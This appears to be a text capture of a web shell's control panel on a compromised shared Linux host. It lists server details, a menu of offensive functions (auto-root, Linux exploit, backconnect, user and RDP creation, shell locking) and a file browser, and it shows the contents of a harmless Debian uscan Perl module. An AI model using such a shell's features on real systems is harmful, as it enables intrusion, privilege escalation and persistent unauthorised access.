Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
Devscripts /
Uscan /
Ctype /
[ HOME SHELL ]
Name
Size
Permission
Action
nodejs.pm
717
B
-rw-r--r--
perl.pm
712
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : nodejs.pm
package Devscripts::Uscan::Ctype::nodejs; use strict; use Moo; use JSON; use Devscripts::Uscan::Output; has dir => (is => 'ro'); has pkg => ( is => 'rw', lazy => 1, default => sub { $_[0]->{dir} . '/package.json'; }); sub version { my ($self) = @_; return unless $self->dir and -d $self->dir; unless (-r $self->pkg) { uscan_warn "Unable to read $self->{pkg}, skipping current version"; return; } my ($version, $content); { local $/ = undef; open my $f, $self->pkg; $content = <$f>; close $f; } eval { $version = decode_json($content)->{version}; }; uscan_warn $@ if $@; return $version; } 1;
Close